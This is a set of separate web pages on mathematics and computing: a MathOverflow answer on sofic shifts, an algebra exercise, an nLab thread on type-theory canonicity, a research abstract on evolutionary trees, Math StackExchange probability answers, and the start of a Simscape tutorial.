http://mathoverflow.net/questions/107048/relative-irreducibility?sort=votes
# Relative irreducibility Let $X$ be a one-dimensional one-step irreducible shift of finite type and let $\pi$ be a one-block factor code from $X$ to a sofic shift $Y$. Suppose $y$ is a right transitive point of $Y$ and $\pi(u)=y$ for some $u\in X$. Given $u_0=a$ and a block $B$ of $X$, is there a point $x\in\pi^{-1}(y)$ such that $x_0=a$ and $B$ occurs in $x_{[0,\infty)}$? (Note that the stronger statement is true when $\pi$ is a finite-to-one code: a point is transitive if and only if its image under $\pi$ is transitive, so $B$ actually occurs infinitely often to the right in $x$.) Thanks to the helpers. - Sorry that this is slightly technical... It uses some concepts that Mahsa showed me in answering a simpler question that I asked her. Using results from http://arxiv.org/abs/1001.5323v1, we may assume that there exists a 'magic symbol' $k\in Y$ satisfying the following: for any word $y_m\cdots y_n$ of $Y$ with $y_m=y_n=k$, any word $x_m\cdots x_n$ of $X$ with $\pi(x_m\cdots x_n)=y_m\cdots y_n$ can be extended to a sequence $x\in X$ with $\pi(x)=y$. This is not actually the definition of a magic symbol but a theorem about them; see the above paper for a definition. We assume that the desired word $B$ of $X$ starts and finishes with elements of $\pi^{-1}(k)$; if not, we just extend the word $B$ a little. We let $B=b_1\cdots b_m$ and $C=\pi(B)$. Let $A=\{a^1,\cdots,a^j\}$ be the set of possible values of $x_1$ for words $x_1\cdots x_m$ with $\pi(x_1\cdots x_m)=C$. Clearly $b_1\in A$; we let $a^1=b_1$. We begin with the following lemma: \begin{lemma} There exists a word $W=w_1\cdots w_n$ in $Y$ with $w_1=w_n=k$ such that for each $a\in A$ there exists a word $V=v_1\cdots v_n\in X$ with $\pi(V)=W$, $V$ contains $B$ and $v_1=a$. \end{lemma} To prove the lemma we define $W=w_1\cdots w_{i_j}$ in chunks which deal with the possible values of $v_1\in A$. We let $w_1\cdots w_{i_1}$ be the word $C$. 
Then for $v_1=a^1$ we are done, since $B$ is a preimage of $C$ which starts with $a^1$. Since $B$ starts and finishes with elements of $\pi^{-1}(k)$, it can be extended to a sequence $x$ projecting to $y$. Now we deal with $a^2$. By the definition of $A$, there exists a preimage of $C$ starting with $a^2$. By the transitivity of $X$, this preimage, which is a finite word of $X$, can be extended to another finite word $x_1\cdots x_{i_2}\in X$ which finishes with the word $B$. We let $w_1\cdots w_{i_2}=\pi(x_1\cdots x_{i_2})$, noting that $i_2>i_1$ and $\pi(x_1\cdots x_{i_1})=w_1\cdots w_{i_1}$, so there is no conflict with the values of $W$ which we have already defined. Now we use the same trick for $a^3$. There is a preimage of $w_1\cdots w_{i_1}$ ($=C$) starting with $a^3$, and hence there must be a preimage of $w_1\cdots w_{i_2}$ starting with $a^3$, because $w_1$, $w_{i_1}$ and $w_{i_2}$ are all equal to the magic symbol $k$. Let $x_1\cdots x_{i_2}$ be this word; because $X$ is transitive we can extend it to a finite word $x_1\cdots x_{i_3}$ in $X$ finishing with the block $B$. Let $w_1\cdots w_{i_3}=\pi(x_1\cdots x_{i_3})$. We continue this process until we have a word $W=w_1\cdots w_{i_j}$. This word $W$ satisfies the conditions of the lemma, so the lemma is proved. Now let $y\in Y$ be a transitive sequence. Then $y$ contains the word $W$, say $y_l\cdots y_{l+i_j}=W$. For our desired starting symbol $u$ there exists a word $x_1\cdots x_l$ with $x_1=u$ and $\pi(x_1\cdots x_l)=y_1\cdots y_l$, since there exists a preimage of $y$ starting with $u$. Here $x_l$ will be some member of $A$, and then using the lemma we can extend $x_1\cdots x_l$ to a sequence which contains $B$ and projects to $y$, as required. -
2014-12-20 18:43:36
https://www.gradesaver.com/textbooks/math/algebra/introductory-algebra-for-college-students-7th-edition/chapter-2-section-2-2-the-multiplication-property-of-equality-exercise-set-page-130/44
## Introductory Algebra for College Students (7th Edition)

$z=3$

$2z=-4z+18$. First add $4z$ to both sides: $2z+4z=18$, so $6z=18$. Then divide both sides by $6$: $6z\div6=18\div6$, giving $z=3$. Check the answer: $2(3)=-4(3)+18$ gives $6=-12+18$, i.e. $6=6$.
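The two steps above (add $4z$ to both sides, then divide by $6$) can be mirrored in a few lines of Python as a sanity check; the function name is mine, not from the textbook.

```python
# Solve 2z = -4z + 18 by the same two steps as in the worked solution.
def solve_for_z():
    # Add 4z to both sides: 2z + 4z = 18, i.e. 6z = 18.
    coeff, rhs = 2 + 4, 18
    # Divide both sides by 6.
    return rhs / coeff

z = solve_for_z()
assert 2 * z == -4 * z + 18  # check: 6 = -12 + 18
```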
2018-09-23 23:37:15
https://nforum.ncatlab.org/discussion/4165/
• CommentRowNumber1. • CommentAuthorUrs • CommentTimeSep 4th 2012

added to canonical form references (talk notes) on canonicity or not in the presence of univalence

• CommentRowNumber2. • CommentAuthorDavid_Corfield • CommentTimeMay 5th 2016 • (edited May 5th 2016)

With my workshop happening, I seem to keep hearing about the delights of canonicity. Coming from the category theoretic side, what's the deal with it? Do I understand from this in the HoTT book

> This construction of the free monoid is possible essentially because elements of the free monoid have computable canonical forms (namely, finite lists). However, elements of other free (and presented) algebraic structures — such as groups — do not in general have computable canonical forms. For instance, equality of words in group presentations is algorithmically undecidable. However, we can still describe free algebraic objects as higher inductive types, by simply asserting all the axiomatic equations as path constructors.

that canonicity goes as soon as we do any non-trivial algebra. So why should I care? Two specific questions:

- Is it that as soon as we have HITs with a path constructor that we lose canonicity?
- In the example on canonical form where it shows how a use of univalence gets stuck, was the function from $\mathbb{N}$ to itself chosen just as an example of a non-identity isomorphism?

• CommentRowNumber3. • CommentAuthorzskoda • CommentTimeMay 5th 2016

• CommentRowNumber4. • CommentAuthorDavid_Corfield • CommentTimeMay 5th 2016

Thanks! Fixed now.

• CommentRowNumber5. 
• CommentAuthorMike Shulman • CommentTimeMay 5th 2016

> canonicity goes as soon as we do any non-trivial algebra

Well, most nontrivial algebraic structures, like groups, rings, and so on are defined the way they are for other (perfectly good) reasons, and not with canonicity or computation in mind. So it's not surprising that free algebras don't have canonical forms. But when we view type theory as an "algebraic theory" of sorts, then it is usually constructed so as to be "computable" and therefore to have canonical forms, even though it is of course highly nontrivial (and the proof that it does have canonical forms is likewise highly nontrivial).

> Is it that as soon as we have HITs with a path constructor that we lose canonicity?

The way HITs are currently defined in "Book HoTT" as well as in Coq, Agda, and Lean, yes. Cubical type theory can handle at least some HITs while retaining canonicity.

> In the example on canonical form where it shows how a use of univalence gets stuck, was the function from $\mathbb{N}$ to itself chosen just as an example of a non-identity isomorphism?

Yes. I don't know why that example was chosen; there are much simpler nonidentity isomorphisms like $swap:2\to 2$.

• CommentRowNumber6. • CommentAuthorDavid_Corfield • CommentTimeMay 5th 2016 • (edited May 5th 2016)

Thanks!

> Cubical type theory can handle at least some HITs while retaining canonicity.

What of is_inhab$(A)$, where $A$ has canonical elements?

• CommentRowNumber7. • CommentAuthorMike Shulman • CommentTimeMay 5th 2016

You mean the propositional truncation? Yes, that's one of the ones they do.

• CommentRowNumber8. • CommentAuthorDavid_Corfield • CommentTimeMay 5th 2016

Yes, great. Where do they do this? Who are 'they' anyway?

• CommentRowNumber9. • CommentAuthorMike Shulman • CommentTimeMay 5th 2016

One "they" is Thierry Coquand and his coauthors: the propositional truncation is on p20 of this paper. 
Dan Licata and Guillaume Brunerie were independently working on a cubical type theory for at least a while, but I don't think they've actually posted a writeup yet; the slides available on Dan's web site don't mention the truncation. The recent Angiuli-Harper-Wilson paper also doesn't mention truncation explicitly. But I'm sure that it will work just about as well in all versions.

• CommentRowNumber10. • CommentAuthorDavid_Corfield • CommentTimeMay 6th 2016

Thanks. It's p.25 of the Coquand et al. paper if anyone's looking.

• CommentRowNumber11. • CommentAuthorUrs • CommentTimeMay 6th 2016

Despite having heard various talks about it, I keep being uncertain as to what the claim regarding cubical type theory and univalence really is. It sounds as if the following is claimed: "In principle it is possible to take any proof in book HoTT that uses univalence and systematically turn it into a program that computes." Has this been proven?

• CommentRowNumber12. • CommentAuthorMike Shulman • CommentTimeMay 6th 2016

I'm not the best person to answer that, since I have trouble keeping up with all the different cubical theories and exactly what has and hasn't been done (and I have to admit that keeping up with all of them is not high on my priority list). That's certainly the goal (although "program that computes" has to be taken with a grain of salt — only a term belonging to a type like nat or bool will actually compute a "value" in the ordinary sense), and a lot of progress has been made. But there have been various technical issues that I don't know whether they have all been dealt with at once, regarding things like whether the rules for paths in the universe (univalence) can be consistently defined at all levels, and whether Id-elim satisfies its computation rule judgmentally or only typally.

• CommentRowNumber13. 
• CommentAuthorspitters • CommentTimeMay 14th 2016

One such result is here; it also refers to a proof of canonicity by the cubical team, which will hopefully be published shortly.
2021-09-20 20:51:49
http://pubman.mpdl.mpg.de/pubman/faces/viewItemOverviewPage.jsp?itemId=escidoc:1825059
#### On the complexity of computing evolutionary trees

##### MPG Authors

http://pubman.mpdl.mpg.de/cone/persons/resource/persons44478 Gasieniec, Leszek (Algorithms and Complexity, MPI for Informatics, Max Planck Society)

##### Full texts (freely accessible)

1996-1-031 (any full text), 11KB

##### Citation

Gasieniec, L., Jansson, J., Lingas, A., & Östlin, A. (1996). On the complexity of computing evolutionary trees (MPI-I-1996-1-031). Saarbrücken: Max-Planck-Institut für Informatik.

In this paper we study a few important tree optimization problems with applications to computational biology. These problems ask for trees that are consistent with as large a part of the given data as possible. We show that the maximum homeomorphic agreement subtree problem cannot be approximated within a factor of $N^{\epsilon}$, where $N$ is the input size, for any $0 \leq \epsilon < \frac{1}{18}$ in polynomial time, unless P=NP. On the other hand, we present an $O(N\log N)$-time heuristic for the restriction of this problem to instances with $O(1)$ trees of height $O(1)$, yielding solutions within a constant factor of the optimum. We prove that the maximum inferred consensus tree problem is NP-complete and we provide a simple fast heuristic for it, yielding solutions within one third of the optimum. We also present a more specialized polynomial-time heuristic for the maximum inferred local consensus tree problem.
2017-03-26 11:03:38
http://math.stackexchange.com/tags/random-variables/new
# Tag Info 1 To find the p.d.f of the ratio $\frac{Y}{X+Y}$, let us first write its c.d.f. Since $X$ and $Y$ are always positive, their ratio is also positive and, therefore, for $0\leq t\lt1$ we can write: $P\left(\frac{Y}{X+Y}\leq t\right)=P\left(Y\leq \frac{t}{1-t}X\right)=\int_{0}^{\infty }\left(\int_{0}^{\frac{t}{1-t}x}f_{X}(x)f_{Y}(y)dy\right)dx$ as ... 0 You know that $K$ of the $2N$ computers were checked until the $N$-th of one version was found.   Thus the $K$-th computer is of that type, and $0\leq K{-}N < N \leq K < 2N$. Now the probability of selecting $N{-}1$ of $N$ computers of one version, and $k-N$ of the $N$ computers of the other, in any order, then selecting the $1$ remaining ... 1 For any positive integer $n$, we have $T_n-S_n = g(T_n,S_n)$ where $g:\mathbb R^2\to \mathbb R$ is the map $(x,y)\mapsto x-y$. Given $t\in\mathbb R$, it is clear that $$g^{-1}((-\infty,t]) = \{(x,y):x-y\leqslant t\}$$ is a Lebesgue-measurable set in $\mathbb R^2$, and so $g$ is a measurable function. Since $\sigma(g(T_n,S_n))\subset \sigma(T_n,S_n)$, ... 0 Let $\mu=E(X)$. Then $cov(X)=E(XX^T)-\mu\mu^T$ and $cov(AX)=E((AX)(AX)^T)-(A\mu)(A\mu)^T=A(E(XX^T)-\mu\mu^T)A^T=Acov(X)A^T$. 2 For $x>1$, we have $$\mathbb P(\xi_n\leqslant x) = \mathbb P\left(\bigcap_{i=1}^n \left\{\eta_i\leqslant x\right\}\right)=\prod_{i=1}^n\mathbb P\left(\eta_i\leqslant x \right) = \left(1 - x^{-\alpha}\right)^n.$$ Hence \begin{align} \mathbb P(\zeta_n\leqslant x) &= \mathbb P\left(\xi_n n^{-\frac1\alpha}\leqslant x\right)\\ &= \mathbb ... 0 We first do it more or less in the way you attempted. There are $\binom{10}{7}$ equally likely ways to choose $7$ wines. First we find the number of ways to choose $0$ Pinks. There is only one way, so $\Pr(Y=0)=\frac{1}{\binom{10}{7}}$. For the future, note that this is $\frac{\binom{3}{0}\binom{7}{7}}{\binom{10}{7}}$. So now we know $\Pr(Y=0)$. Next we ... 0 Close, but a few details need attention. 
Assuming the selection is unbiased and without repetition, then the probability of choosing $y$ of $3$ white wines, and $7-y$ of $7$ not white wines, out of all the ways to choose $7$ of $10$ wines is: $$\Pr(Y=y) \;=\; \mathbf 1_{y\in\{0,1,2,3\}}\cdot{\dbinom{3}{y}\dbinom{7}{7-y}}\Big/{\dbinom{10}{7}}$$ So the ... 1 Notice that because of independence: $$P\left(X^2 < \frac{1}{2}, |Y| < \frac{1}{2} \right) = P\left(X^2 < \frac{1}{2}\right) P\left(|Y| < \frac{1}{2} \right)$$ Analyzing the $X$ term: P\left(X^2 < \frac{1}{2}\right) = P \left( -\frac{1}{\sqrt{2}} < X < \frac{1}{\sqrt{2}} \right) = ... 0 If $Z\sim\text{unif}(-1,1),$then $$f_{|Z|}(z) = 1.$$ You can take this to mean that $|Z|\sim\text{unif}(0,1)$. In your case $$P(X^2<1/2,|Y|<1/2) = P(|X|<1/\sqrt 2)\cdot P(|Y|<1/2) = (1/\sqrt 2)(1/2),$$ since $X$ and $Y$ are independent. 2 Since $X$ and $Y$ are independent, we have $$\Pr[(X^2 \le 1/2) \cap (|Y| \le 1/2)] = \Pr[X^2 \le 1/2]\Pr[Y \le 1/2].$$ Since they are uniform on $[-1,1]$, we then have $$\Pr[X^2 \le 1/2] = \Pr[-1/\sqrt{2} \le X \le 1/\sqrt{2}] = \frac{1/\sqrt{2} - (-1/\sqrt{2})}{1 - (-1)} = \frac{1}{\sqrt{2}},$$ and $$\Pr[|Y| \le 1/2] = \Pr[-1/2 \le Y \le 1/2] = ... 2 Hint: X^2< \frac12\iff |X|<\frac1{\sqrt2}. If X and Y are independent, then |X| and |Y| are also independent. Complete the sentence: if A and B are independent, then P(A, B) = ... 0 You're wrong with your initial assumption. Actually, we have$$P (X_n = k) = \frac {6 - |k - 7|} {36}.$$Also, the probability you ask for is the sum$$\sum_{k = 1}^{12} (P(X_n = k)^2) = \sum_{k = 1}^{12} \left ( \frac {6 - |k - 7|} {36} \right )^2 = \frac {1} {1296} \sum_{k = 1}^{12} (36 + (k - 7)^2 - 12 |k - 7|) = \frac {12 \cdot 36 + 146 - 12 \cdot 36} ... 
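The independence arguments in the answers above all reduce the joint probability $P(X^2<\tfrac12,\,|Y|<\tfrac12)$, for $X,Y$ uniform on $[-1,1]$, to a product of interval lengths. A small Python sketch (the helper name is my own) makes the computation explicit:

```python
import math

def uniform_prob(lo, hi, a=-1.0, b=1.0):
    """P(lo <= U <= hi) for U uniform on [a, b]: clipped length over total length."""
    lo, hi = max(lo, a), min(hi, b)
    return max(hi - lo, 0.0) / (b - a)

# P(X^2 < 1/2) = P(-1/sqrt(2) < X < 1/sqrt(2)) = 1/sqrt(2)
p_x = uniform_prob(-1 / math.sqrt(2), 1 / math.sqrt(2))
# P(|Y| < 1/2) = 1/2
p_y = uniform_prob(-0.5, 0.5)
# Independence: the joint probability is the product.
p = p_x * p_y
assert abs(p - 1 / (2 * math.sqrt(2))) < 1e-12
```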
0 Hints: $\mathbb EX=P(X\geq1)+\dots+P(X\geq N)$ $P(X\geq k+1)+P(X\leq k)=1$ edit: $$\mathbb{E}X=\sum_{i=1}^{N}ip_{i}=\sum_{i=1}^{N}\sum_{k=1}^{i}p_{i}=\sum_{k=1}^{N}\sum_{i=k}^{N}p_{i}=\sum_{k=1}^{N}P\left(X\geq k\right)=$$$$\sum_{k=1}^{N}\left(1-P\left(X\leq k-1\right)\right)=N-\sum_{k=1}^{N}P\left(X\leq k-1\right)=N-\sum_{k=n}^{N-1}P\left(X\leq ... 1 The answer to your first question is yes: if c \ne 0 and c \in \mathbb R, then cX \sim \operatorname{Normal}(c\mu, |c|\sigma) if X is normal with mean \mu and standard deviation \sigma. This is because the normal distribution belongs to a location-scale family: its PDF is$$f_X(x) = \frac{1}{\sqrt{2\pi}\sigma} e^{-(x-\mu)^2/(2\sigma^2)}, \quad ... 0 The answer is negative. If $(r_n)$ is lacunary sequences (that is $r_{n+1}>ar_n$ for some $a>1$), then for any probability preserving transformation $T\colon X\to X$ and any $\delta>0$ there is $A\subset X$ with $0<\mu(A)<\delta$ such that $$\limsup_n \frac{1}{n} \sum_{k=0}^{n-1} \chi_A (T^{r_k}x)=1 \quad \text{ for a.e. x\in X.}$$ Akcoglu ... 1 The probability of extinction is the smallest positive root of $$G_O(z)=z$$ Where $O$ denotes the offspring distribution, and $G_O(z)$ its generating function at $z$. It is easily seen that $G_O(0)$ is the probability of extinction in the first generation. Second, if you know about generating functions, then you know that the sum: , where $X$ is ... 2 For any $p \geq 1$, we have $$|x+y|^p \leq 2^p (|x|^p+|y|^p),$$ and therefore \begin{align*} \mathbb{E}(|X_n-X|^p \mid \mathcal{F}) &\leq 2^p \mathbb{E}(|X_n|^p \mid \mathcal{F}) + 2^p \mathbb{E}(|Y|^p \mid \mathcal{F}) \\ &\leq 2^p \mathbb{E}(|X|^p \mid \mathcal{F}) + 2^p \mathbb{E}(|Y|^p \mid \mathcal{F}). \end{align*} This shows that ... 0 Just to be clear: The expectation of an Indicator Random Variable is the probability of it being 1. 
\begin{align}\mathsf E(X_i) & = 0\cdot \mathsf P(X_i=0)+1\cdot \mathsf P(X_i=1)\\ & = \mathsf P(X_i=1)\end{align} $X_i$ is the indicator that red ball #$i$, for $i\in\{1..10\}$, is one of the $12$ out of $30$ balls drawn. Imagine we lay the ... 1 As $0 \leq a, \bar{a} \leq 1$, we have $$(a-\bar{a})(a + \bar{a}) \leq |(a-\bar{a})(a+\bar{a})| = |a-\bar{a}| \cdot \underbrace{|a+\bar{a}|}_{= a+\bar{a} \leq 2}.$$ Taking expectation on both sides, proves the inequality. 1 $$E[(a-\bar{a})(a+\bar{a})]\leq E[|a-\bar{a}|(a+\bar{a})]\leq 2E[|a-\bar{a}|],$$ where the second inequality follows from the fact that $(a+\bar{a})\leq 2$. 1 No, there is nothing to be said about the Cesàro averages of the whole sequence. They can be as bad as the sequence itself. Indeed, given any weakly convergent sequence $\{f_n\}$, we can consider another sequence $\{g_n\}$ defined as $$f_1,f_1, f_2,f_2,f_2,f_2, f_2,f_2,f_2,f_2, f_2,f_2,f_2,f_2, f_2,f_2,f_2,f_2, f_3, \dots$$ where the term $f_n$ appears ... -1 Important inequalities (Probability w/ Martingales): 1, 2 $$\liminf x_n > z \to \liminf(x_n > z)$$ $$\liminf x_n < z \to \limsup(x_n < z)$$ 'if' Suppose $\forall \epsilon>0$, $$\sum_{n=1}^{\infty}\textrm{P}\left(\left|X_{n}\right|>\epsilon\right)<\infty$$ By BCL1, we have $$\textrm{P}\left(\limsup ... 0 For the employer to know the order in which the computers were checked, he must have been noting the first computer as version A and the first computer with a different version than A as B and then forgetting what version A and B correspond to. An example of a sample path of him noting: A, A, B, A, B, B, A, ... When he has N of the same system ... 1 Suppose that we have some points y_{1},y_{2},\dots,y_{n} and we have the model$$y_{i}=x_{i}^{T}\beta+\xi_{i}where the \xi_{i} are i.i.d. \mathcal{N}(0,\sigma^{2}) noise terms, \beta\in\mathbb{R}^{p} and x_{i}\in\mathbb{R}^{p}. This can be rewritten as y=X^{T}\beta+\xi where the columns of X are x_{1},\dots,x_{n} and \xi is a ... 
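The indicator argument above ($\mathsf E(X_i)=\mathsf P(X_i=1)$, with red ball #$i$ drawn with probability $12/30$) predicts an expected count of $10\cdot 12/30=4$ red balls among the $12$ drawn. A quick exact check against the hypergeometric mean, in Python (the variable names are mine; the $10/30/12$ numbers come from the answer):

```python
from math import comb

# Exact hypergeometric mean: 10 red balls among 30, draw 12 without replacement.
n_red, n_total, n_draw = 10, 30, 12
mean = sum(
    k * comb(n_red, k) * comb(n_total - n_red, n_draw - k)
    for k in range(0, min(n_red, n_draw) + 1)
) / comb(n_total, n_draw)

# Linearity of expectation via indicators predicts n_red * n_draw / n_total = 4.
assert abs(mean - n_red * n_draw / n_total) < 1e-9
```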
0 Note that we have \begin{align*} \def\E{\mathbf E}\E[y^* C_{yy}^{-1}y] &= \E\left[\sum_{i,j} \bar y_i \bigl(C_{yy}^{-1}\bigr)_{ij} y_j\right]\\ &= \sum_{i,j} \bigl(C_{yy}^{-1}\bigr)_{ij} \E[\bar y_i y_j]\\ &= \sum_{i,j} \bigl(C_{yy}^{-1}\bigr)_{ij} \bigl(C_{yy}\bigr)_{ji}\\ &= \operatorname{tr} C_{yy}^{-1}C_{yy}\\ &= n. ... 1 It is a standard result in measure theory that for nonnegative functions $f$ $$\int_A f \, d\mu = \lim_{n \to \infty} n \mu(f^{-1}([n,\infty))) + \sum_{k=1}^{n^2-1} \frac{k}{n} \mu(f^{-1}([k/n,(k+1)/n))).$$ (The details of the partitioning are not so important; the important matter is that the mesh size goes to zero and the upper bound goes to infinity.) For ... 1 $$\int_{-\infty}^\infty\int_{-\infty}^y f(x,y)\;dx\;dy$$ 0 Yes, we will have to divide into cases. There are two uninteresting cases, (i) $y\le 0$ and (ii) $y\ge 2$. If $y\le 0$, then $F_Y(y)=\Pr(Y\le y)=0$. If $y\ge 2$ then $\Pr(Y\le y)=1$. The other two cases are (iii) $0\le y\le 1$ and (iv) $1\lt y\lt 2$. Case (iii): We have $Y\le y$ if and only if $-y\le X\le y$. The density function of $X$ on the interval ... 0 You were on the right track. The only problem with your solution is that you don't take into consideration that $P(Y\lt 1\mid X\lt 1)=1$, since $0<y<x$. If you take that into consideration, you will find: $$P(Y\lt 1) = \int_{0}^{3} P(Y \lt 1 \mid X = x) \, f_x(x) \, dx$$ $$P(Y\lt 1) = \int_{0}^{1} 1\cdot f_x(x) \, dx + \int_{1}^{3} P(Y \lt 1 \mid X = x) \ ... 0 I believe the abuse of notation which is causing the confusion involves the notion of the preimage of an element of the codomain of the random variable. https://en.wikipedia.org/wiki/Image_(mathematics) Consider fact 2.13 without the abuse of notation. Let $X$ be a random variable on $S$. Then E(X) = \sum\limits_{x \in \mathbb{R}}x ... 0 If $g$ denotes the conditional PDF then it is prescribed by $x\mapsto\frac{32}{15}x$ if $\frac14<x<1$ and $x\mapsto0$ otherwise. 
$$P(X>\frac34|Y=\frac14)=\int\chi_{(\frac34,\infty)}g(x)dx=\int_{\frac34}^1\frac{32}{15}x\,dx$$ 1 When you calculate a function (here $f_{X\mid Y=1/4}$), always write down its domain as well. Here the domain of $f_{X\mid Y=1/4}$ is: $$f_{X\mid Y=1/4}(x \mid 1/4)=\begin{cases}\frac{32}{15}x, & 1/4<x<1 \\0, & \text{else } \end{cases}$$ Now you see that $$P(X >3/4 \mid Y=1/4)=\int_{3/4}^{1}\frac{32}{15}x\ dx$$ 2 We have $$E(X^2)=\int_0^\infty x^2 \lambda e^{-\lambda x}dx=\frac{2}{\lambda^2}$$ So, $$Var(X)=E(X^2)-E(X)^2=\frac{2}{\lambda^2}-\frac{1}{\lambda^2}=\frac{1}{\lambda^2}$$ 1 No, there's no need to calculate the density of $V$.   Don't make unnecessary work for yourself. You have $X \sim \mathcal U\{0,1,2,3,4,5\}$, and $R\sim\mathcal U(0.04;0.08)$, and $X$ and $R$ are independent. You want to calculate $\mathsf E(X \,\mathsf e^{2R})$.   That is: $$\mathsf E(X\, \mathsf e^{2R}) = \sum_{x=0}^5 ... 1 One step at a time. First step. If $0 \lt X^2$ then $\frac 1{X^2}\lt \infty$, because the inverse of every positive number is a finite number. Second step. If $0 < X^2\leq 1$ then $1\leq \frac{1}{X^2}$, because the inverse of every positive number no greater than one must be a positive number no less than one. Put it ... 0 Hint: If $X=aY+b$ then how are $X^*$ and $Y^*$ related? 0 I agree that the assertion looks a little odd, but it is correct. Using your analysis, we have that $$\Pr(X\le k\le \alpha X)=\Pr\left(X\ge \frac{k}{\alpha}\right)-\Pr(k\le X).$$ (Note the correction in the second term.) The first term on the right is then $1-\Pr(X\le \frac{k}{\alpha})$ and the second term is $1-\Pr(k\ge X)$. Subtract and note the ... 1 Outline: Let $a$ be the probability that a randomly chosen female Smurf is between 1 and 1.3, and let $b$ be the corresponding probability for male Smurfs (Smurves?). Then our required probability is $(0.6)a+(0.4)b$. 
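The exponential variance computation above ($E(X^2)=2/\lambda^2$, hence $Var(X)=1/\lambda^2$) is easy to sanity-check numerically. The midpoint-rule integrator below is my own sketch, not part of any answer:

```python
import math

def exp_mean_var(lam, upper=60.0, n=200_000):
    """Midpoint-rule moments of the Exp(lam) density on (0, upper)."""
    dx = upper / n
    m1 = m2 = 0.0
    for i in range(n):
        x = (i + 0.5) * dx
        w = lam * math.exp(-lam * x) * dx  # density times cell width
        m1 += x * w
        m2 += x * x * w
    return m1, m2 - m1 * m1  # (mean, variance)

mean, var = exp_mean_var(2.0)
assert abs(mean - 1 / 2.0) < 1e-3    # E(X) = 1/lambda
assert abs(var - 1 / 2.0**2) < 1e-3  # Var(X) = 1/lambda^2
```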
0 $$P\{ Y \le y\} = P\left\{\frac{1}{Z}\le y\right\} = P\left\{Z \ge \frac{1}{y}\right\} = \int_{1/y}^\infty f_Z(z)\,\mathrm{d}z\implies f_Y(y) = \frac{\partial}{\partial y} P\{Y \le y\} = \frac{1}{y^2} f_Z(1/y)$$ Alternatively, recall that densities of transformed random variables are in the ratio of the Jacobian of the transformation. $$z = ... 0 The change of variables formula is (from the chain rule): \begin{align} f_{g(Z)}(y) & = f_Z(g^{-1}(y)) \cdot \lvert \mathcal D_y\; g^{-1}(y)\rvert & \textrm{where } g(z) \textrm{ is an invertible function} \\[2ex] f_Y(y) & = f_Z(1/y)\cdot\left\lvert\dfrac{\operatorname d y^{-1}}{\operatorname d y\quad}\right\rvert & \textrm{since } g(z)=1/z ... 1 By the properties of a continuous density, $$\mathbb P(0 < Y \le b) = \int_0^b f_Y(y) \, dy.$$ Therefore, for $Y = 1/Z$, $$\mathbb P(0 < Y \le y) = \mathbb P(Z \ge 1/y) = \int_{1/y}^{\infty} f_Z(z) \, dz = 1/2 - \int_0^{1/y} f_Z(z) \, dz.$$ Differentiating with respect to $y$ to recover $Y$'s density, $$f_Y(y) = \frac d{dy} \left( 1/2 - ... 0 Hint: If $B$ is an event in $F$ and $g:\Bbb R\to\Bbb R$ is bounded and continuous, then $\Bbb E[1_Bg(X)]=\lim_{n\to\infty}\Bbb E[1_Bg(X_n)]$. [For this you need to know that convergence in probability is preserved by composition with continuous functions.] 0 HINT: I'll go ahead and give you a hint on part A since you haven't shown much effort or thought in searching for an answer. What's your expected location? The average distance you would have to walk to either bus stop should be total possible distance minus your expected distance. 0 For your first question, we have $$P\left(X^2\leq y\right)$$ $$=P\left(\sqrt{X^2}\leq \sqrt y\right)$$ $$=P\left(\left|X\right|\leq \sqrt y\right)$$ $$=P\left(-\sqrt{y}\leq X\leq\sqrt{y}\right)$$ For your second question, we have $$-1\lt x\lt 1$$ which can be rewritten as $$\left|x\right|\lt 1$$ or $$0\leq\left|x\right|\lt 1$$ Have a look at absolute value. 1 $Z$ is nonnegative so $f_{Z}\left(x\right)=0$ if $x<0$. 
For $x\geq0$ we have: $$F_{Z}\left(x\right)=F_{X}\left(\sqrt{x}\right)-F_{X}\left(-\sqrt{x}\right)$$ Consequently: ... 0 While Ákos Somogyi's answer is correct, this is not the best approach to solve this kind of problem. There is a transformation of density formula, which says that if $X$ has density $f_X$ and $h$ is piecewise continuously differentiable and piecewise strictly monotone, then $Y=h(X)$ has the density $$f_Y(y) = \sum_{x: h(x) = y} \frac{f_X(x)}{|h'(x)|}. \tag{1}$$ ... 1 $$\mathbb{P}(X\in[-\sqrt{z},\sqrt{z}])=\mathbb{P}(X<\sqrt{z})-\mathbb{P}(X<-\sqrt{z})=\boxplus$$ Now since $X$ is uniform on $[-1,2]$, its CDF is: $$F_X(x)=\chi_{x\in(2,\infty)}+\frac{1}{3}(x+1)\chi_{x\in[-1,2]}$$ Thus by taking the range into consideration, we obtain: $$ ... 0 Since you said you've enumerated the outcomes for $X$, do the same for $Z$. Below I made a table for the values of both $X$ and $Z$. Can you now make the corresponding table for $W = XZ$? \begin{array}{|c|c|c|c|c|c|c|} \hline X& 1 & 2 & 3 & 4 & 5 & 6 \\ \hline 1 & 2 & 3 & 4 & 5 & 6 & 7 \\ 2 & 3 & 4 ... 0 For each outcome of the two rolls, find the values of $X$ and $Z$, and the value of $W$ is given by their product. -1 Let's say a coin is tossed once: we get the expectation of the number of heads as E[R] = no. of heads * P(no. of heads) = 1*1/2 = 1/2. Now let n=2: E[R2] = 2*1/4 + 1*2/4 + 0*1/4 = 1. Now let n=3: E[R3] = 3*1/8 + 2*3/8 + 1*3/8 = 12/8 = 3/2. Continuing in this way we observe that E[Rn] = n*1/2. This is the linearity of expectation. That is, E[R] = ...
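The transformation $f_Y(y)=\frac{1}{y^2}f_Z(1/y)$ for $Y=1/Z$, derived in the answers above, can be checked numerically for a concrete $Z$. Here I pick $Z\sim\mathrm{Exp}(1)$ (my choice, not from the thread), for which $P(Y\le U)=P(Z\ge 1/U)=e^{-1/U}$:

```python
import math

def f_Z(z):
    """Density of Z ~ Exp(1)."""
    return math.exp(-z) if z > 0 else 0.0

def f_Y(y):
    """Density of Y = 1/Z via the transformation formula f_Y(y) = f_Z(1/y)/y^2."""
    return f_Z(1.0 / y) / (y * y) if y > 0 else 0.0

def cdf_Y(upper, n=200_000):
    """Midpoint-rule integral of f_Y over (0, upper)."""
    dx = upper / n
    return sum(f_Y((i + 0.5) * dx) for i in range(n)) * dx

# P(Y <= U) computed from the transformed density should equal exp(-1/U).
U = 50.0
assert abs(cdf_Y(U) - math.exp(-1 / U)) < 1e-3
```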
2015-11-26 21:57:21
https://uk.mathworks.com/help/physmod/simscape/lang/case-study-creating-a-basic-custom-block-library.html
## Case Study — Basic Custom Block Library

### Getting Started

This case study explains how to build your own library of custom blocks based on component files. It uses an example library of capacitor models. The library makes use of the Simscape™ Foundation electrical domain, and defines three simple components. For more advanced topics, including adding multiple levels of hierarchy, adding new domains, and customizing the appearance of a library, see Case Study — Electrochemical Library.

